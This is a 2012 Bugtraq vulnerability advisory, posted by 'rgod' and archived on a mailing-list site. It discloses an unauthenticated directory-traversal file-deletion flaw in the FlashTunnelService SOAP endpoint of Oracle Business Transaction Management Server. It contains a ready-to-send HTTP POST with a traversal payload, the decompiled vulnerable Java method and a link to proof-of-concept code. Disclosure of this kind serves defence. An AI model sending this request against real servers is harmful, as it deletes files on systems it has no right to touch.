lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Tue, 7 Aug 2012 11:02:53 GMT
From: nospam@...il.it
To: bugtraq@...urityfocus.com
Subject: Oracle Business Transaction Management Server FlashTunnelService 
 Remote File Deletion

Oracle Business Transaction Management Server 12.1.0.2.7 FlashTunnelService 
Remote File Deletion

tested against: Microsoft Windows Server 2003 r2 sp2
                Oracle WebLogic Server 12c (12.1.1)
                Oracle Business Transaction Management Server 12.1.0.2.7 (Production version)

files tested: 
oepe-indigo-installer-12.1.1.0.1.201203120349-12.1.1-win32.exe (weblogic)
download url: http://www.oracle.com/technetwork/middleware/weblogic/downloads/index.html              

BTM_Servers_12.1.0.2.7.zip (BTM, production version) 
download url: http://www.oracle.com/technetwork/oem/downloads/btw-downloads-207704.html


vulnerability:
the mentioned product installs a web service 
called "FlashTunnelService" which can be reached
without prior authentication and processes incoming
SOAP requests.

It can be reached at the following uri:
http://[host]:7001/btmui/soa/flash_svc/

This soap interface exposes the 'deleteFile' function
which could allow to delete arbitrary files with administrative
privileges on the target
server through a directory traversal vulnerability.
This could be useful for further attacks.

Example packet:

POST /btmui/soa/flash_svc/ HTTP/1.1
Accept-Encoding: gzip,deflate
Content-Type: text/xml;charset=UTF-8
SOAPAction: "http://soa.amberpoint.com/deleteFile"
User-Agent: Jakarta Commons-HttpClient/3.1
Host: [host]:7001
Content-Length: [length]

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:int="http://schemas.amberpoint.com/flashtunnel/interfaces" xmlns:typ="http://schemas.amberpoint.com/flashtunnel/types">
   <soapenv:Header/>
   <soapenv:Body>
      <int:deleteFileRequest>
         <int:deleteFile handle="../../../../../../../../../../../../somepath/somefile.ext">
            <typ:DeleteFileRequestVersion>
            </typ:DeleteFileRequestVersion>
         </int:deleteFile>
      </int:deleteFileRequest>
   </soapenv:Body>
</soapenv:Envelope>

Vulnerable code, see the decompiled com.amberpoint.flashtunnel.impl.FlashTunnelServiceImpl class:
..
public IDeleteFileResponse deleteFile(IDeleteFileRequest request)
        throws SOAPFaultException
    {
        DeleteFileResponse dfr = new DeleteFileResponse();
        String handle = request.getHandle();
        File f = getFileFromHandle(handle);
        if(f != null)
            f.delete();
        return dfr;
    }
..

As attachment, proof of concept code.

poc: http://retrogod.altervista.org/9sg_ora2.htm

rgod

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ